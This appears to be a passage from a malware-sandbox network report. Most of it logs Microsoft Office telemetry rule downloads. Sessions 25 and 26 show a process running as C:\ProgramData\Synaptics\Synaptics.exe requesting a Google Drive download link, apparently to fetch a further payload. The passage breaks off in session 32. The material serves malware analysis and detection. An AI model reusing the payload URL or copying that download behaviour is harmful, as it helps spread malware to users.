                                                                                        21192.168.2.54976213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:23 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                        x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdhk6hphC1EWRaw3c000000030g00000000mhs1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        22192.168.2.54976013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:23 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                        ETag: "0x8DC582B9964B277"
                                                                                        x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdnq7x2hC1EWRpxr000000003600000000078fn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        23192.168.2.54976313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:23 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 632
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                        x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdkw94lhC1EWRxuz400000003ag000000010u6z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        24192.168.2.54976413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:23 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 467
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                        x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdjrnwqhC1EWRpg2800000003f00000000006m3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.549771172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:26 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:25 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--2Eu-v9VzT5f4ql9IxW-kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.549772172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:26 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ursibVWuMQkHT_x2PrQ3vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        27192.168.2.54977613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB344914B"
                                                                                        x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdqpttnhC1EWRe1wg00000002xg00000000xyrr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        28192.168.2.54977513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                        x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdhk6hphC1EWRaw3c000000031g00000000fz4k
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        29192.168.2.54977713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                        x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bddtfvqhC1EWRxbpg000000034000000000w94q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.54977813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                        ETag: "0x8DC582B9018290B"
                                                                                        x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdb8xvchC1EWRmbd400000003a0000000004ad0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        31192.168.2.54977913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:25 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                        ETag: "0x8DC582B9698189B"
                                                                                        x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdnq7x2hC1EWRpxr0000000032g00000000p7dz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        32192.168.2.54978613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:28 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
